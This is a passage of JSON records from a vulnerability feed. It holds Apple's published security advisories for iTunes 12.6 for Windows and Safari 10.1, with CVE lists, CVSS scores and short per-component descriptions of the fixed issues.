for Windows - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479", "CVE-2012-1148", "CVE-2012-1147", "CVE-2015-3415", "CVE-2017-2480", "CVE-2015-3717", "CVE-2016-5300", "CVE-2015-1283", "CVE-2012-6702", "CVE-2016-0718", "CVE-2016-6153", "CVE-2015-3416", "CVE-2017-5029", "CVE-2015-3414", "CVE-2009-3720", "CVE-2015-6607", "CVE-2009-3270", "CVE-2009-3560", "CVE-2017-2463", "CVE-2016-4472", "CVE-2017-2493", "CVE-2013-7443", "CVE-2017-2383"], "modified": "2017-12-11T11:38:44", "id": "APPLE:HT207599", "href": "https://support.apple.com/kb/HT207599", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-11-10T17:00:51", "description": "# About the security content of iTunes 12.6 for Windows\n\nThis document describes the security content of iTunes 12.6 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.6 for Windows\n\nReleased March 21, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\nEntry added March 28, 2017\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple issues in SQLite\n\nDescription: Multiple issues existed in SQLite. These issues were addressed by updating SQLite to version 3.15.2.\n\nCVE-2013-7443\n\nCVE-2015-3414\n\nCVE-2015-3415\n\nCVE-2015-3416\n\nCVE-2015-3717\n\nCVE-2015-6607\n\nCVE-2016-6153\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple issues in expat\n\nDescription: Multiple issues existed in expat. These issues were addressed by updating expat to version 2.2.0.\n\nCVE-2009-3270\n\nCVE-2009-3560\n\nCVE-2009-3720\n\nCVE-2012-1147\n\nCVE-2012-1148\n\nCVE-2012-6702\n\nCVE-2015-1283\n\nCVE-2016-0718\n\nCVE-2016-4472\n\nCVE-2016-5300\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: December 11, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-21T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.6 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3270", "CVE-2009-3560", "CVE-2009-3720", "CVE-2012-1147", "CVE-2012-1148", "CVE-2012-6702", "CVE-2013-7443", "CVE-2015-1283", "CVE-2015-3414", "CVE-2015-3415", "CVE-2015-3416", "CVE-2015-3717", "CVE-2015-6607", "CVE-2016-0718", "CVE-2016-4472", "CVE-2016-5300", "CVE-2016-6153", "CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-21T00:00:00", "id": "APPLE:198F1AB81F91F2CEB090B4B4D49C57AD", "href": "https://support.apple.com/kb/HT207599", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-24T20:42:37", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1\n\nReleased March 27, 2017\n\n**CoreGraphics**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Login AutoFill**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A local user may be able to access locked keychain items\n\nDescription: A keychain handling issue was addressed through improved keychain item management.\n\nCVE-2017-2385: Simon Woodside of MedStack\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative \n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: an anonymous researcher\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2392: Max Bazaliy of Lookout\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative \n\nEntry added August 23, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Webkit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-29T02:51:42", "title": "About the security content of Safari 10.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2395", "CVE-2017-2444", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2376", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2392", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2017-08-29T02:51:42", "id": "APPLE:HT207600", "href": "https://support.apple.com/kb/HT207600", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T11:42:41", "description": "# About the security content of Safari 10.1\n\nThis document describes the security content of Safari 10.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1\n\nReleased March 27, 2017\n\n**CoreGraphics**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Login AutoFill**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A local user may be able to access locked keychain items\n\nDescription: A keychain handling issue was addressed through improved keychain item management.\n\nCVE-2017-2385: Simon Woodside of MedStack\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative \n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 